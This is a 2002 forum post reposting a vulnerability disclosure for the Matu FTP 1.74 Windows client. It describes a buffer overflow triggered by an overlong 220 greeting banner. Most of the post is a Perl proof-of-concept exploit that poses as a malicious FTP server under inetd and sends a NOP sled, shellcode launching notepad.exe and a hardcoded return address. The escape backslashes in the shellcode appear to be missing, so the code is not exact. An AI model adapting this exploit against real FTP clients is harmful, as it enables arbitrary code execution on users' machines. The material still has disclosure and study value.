|
-
April 29th, 2002, 12:48 PM
#1
 Vurnerability: Matu FTP remote buffer overflow
Matu FTP is a Japanese FTP client software for Win32 Platform.
It was found an exploitable buffer overflow problem in Matu FTP Version 1.74.
The buffer overflow occurs when a long string like
220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA
is received by Matu FTP in the beginning of an FTP session.
This vulnerability allows malicious FTP server to execute
an arbitrary code on client hosts.
/*---------------------------
Vendor Status
---------------------------*/
Notified with no response
/*---------------------------
POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.
#!/usr/local/bin/perl
#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "xEBx27x8Bx34x24x33xC9x33xD2xB2";
$egg .= "x0Bx03xF2x88x0Ex2BxF2xB8xAFxA7";
$egg .= "xE6x77xB1x05xB2x04x2BxE2x89x0C";
$egg .= "x24x2BxE2x89x34x24xFFxD0x90xEB";
$egg .= "xFDxE8xD4xFFxFFxFF";
$egg .= "notepad.exe";
#egg_address = 0x0012F43C
$buf = "x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "x3CxF4x12x00";
$buf .= "B" x 80;
print "220 $bufrn";
--
#sorry for the bad english
Kanatoko
http://www.jumperz.net/(Japanese)
Source: http://www.xatrix.org/article1410.html
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote